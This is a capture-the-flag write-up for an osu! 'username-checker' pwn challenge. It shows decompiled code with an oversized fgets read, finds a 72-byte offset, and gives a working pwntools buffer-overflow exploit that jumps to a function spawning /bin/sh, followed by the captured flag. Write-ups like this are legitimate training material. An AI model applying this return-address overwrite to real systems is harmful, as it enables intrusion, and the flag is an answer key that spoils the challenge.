username checker#

Having trouble finding the perfect osu! username? Check whether your usernames are valid using username-checker!

Files#

1
❯ file *
2
checker:    ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=fcf233c90bc0e306027cc14ca4f302293d2f4b5c, for GNU/Linux 3.2.0, not stripped
3
Dockerfile: ASCII text
4
flag.txt:   ASCII text, with no line terminators
5
nsjail.cfg: ASCII text

We have a 64 bit executable checker which we need to crack, opening it in ghidra we can get the source code

1
void main(void)
2
{
3
    setvbuf(_stdin, 0, 2, 0);
4
    setvbuf(_stdout, 0, 2, 0);
5
    puts("~-~ username-checker ~-~");
6
    check_username();
7
    return;
8
}
9

10
// WARNING: Variable defined which should be unmapped: var_10h
11

12
undefined8 check_username(void)
13
{
14
    int32_t iVar1;
15
    int64_t iVar2;
16
    uint64_t uVar3;
17
    undefined8 uVar4;
18
    int64_t *piVar5;
19
    uint64_t uVar6;
20
    char *s1;
21
    int64_t var_1ch;
22
    int64_t var_10h;
23

24
    printf("please enter a username you want to check: ");
25
    fgets(&s1, 0x80, _stdin);
26
    iVar2 = strcspn(&s1, data.00402054);
27
    *(undefined *)((int64_t)&s1 + iVar2) = 0;
28
    uVar3 = strlen(&s1);
29
    if (uVar3 < 0x10) {
30
        for (var_1ch._0_4_ = 0; uVar6 = (uint64_t)(int32_t)var_1ch, uVar3 = strlen(&s1), uVar6 < uVar3;
31
            var_1ch._0_4_ = (int32_t)var_1ch + 1) {
32
            piVar5 = (int64_t *)__ctype_b_loc();
33
            if (((((*(uint16_t *)((int64_t)*(char *)((int64_t)&s1 + (int64_t)(int32_t)var_1ch) * 2 + *piVar5) & 8) == 0)
34
                 && (*(char *)((int64_t)&s1 + (int64_t)(int32_t)var_1ch) != '_')) &&
35
                (*(char *)((int64_t)&s1 + (int64_t)(int32_t)var_1ch) != '[')) &&
36
               (((*(char *)((int64_t)&s1 + (int64_t)(int32_t)var_1ch) != ']' &&
37
                 (*(char *)((int64_t)&s1 + (int64_t)(int32_t)var_1ch) != '-')) &&
38
                (*(char *)((int64_t)&s1 + (int64_t)(int32_t)var_1ch) != ' ')))) {
39
                puts("username contains invalid characters");
40
                return 1;
41
            }
42
        }
43
        iVar1 = strcmp(&s1, "super_secret_username");
44
        if (iVar1 == 0) {
45
            win();
46
            uVar4 = 0;
47
        } else {
48
            puts("username is valid!");
49
            uVar4 = 0;
50
        }
51
    } else {
52
        puts("username is too long");
53
        uVar4 = 1;
54
    }
55
    return uVar4;
56
}
57

58
void win(void)
59
{
60
    puts("how did you get here?");
61
    system("/bin/sh");
62
    return;
63
}

Solving#

Basically what this code does is takes in our input and checks it length and then against super_secret_username

But the key thing is that fgets takes in 0x80 bytes which is way too much so if we input too much we can get a segfault

This means we can overwrite the return address so we can jump to the function win

If we input pwn cyclic into our code and check in gdb where it jumped we can find that the offset is 72 bytes

Now we can write our pwntools exploit:

1
from pwn import *
2
elf = ELF('./checker')
3
win = elf.symbols.get('win', 0)
4
ret = next(elf.search(asm('ret')))
5

6
payload = b'A'*72
7
payload += p64(ret)
8
payload += p64(win)
9
#p = process("./checker")
10
p = remote('username-checker.challs.sekai.team', 1337)
11
#p = gdb.debug("./checker", gdbscript="b win")
12
p.sendline(payload)
13
p.interactive()

Running this gives us a shell and now we can cat flag.txt giving us the flag: osu{thats_not_a_val1d_username_:(}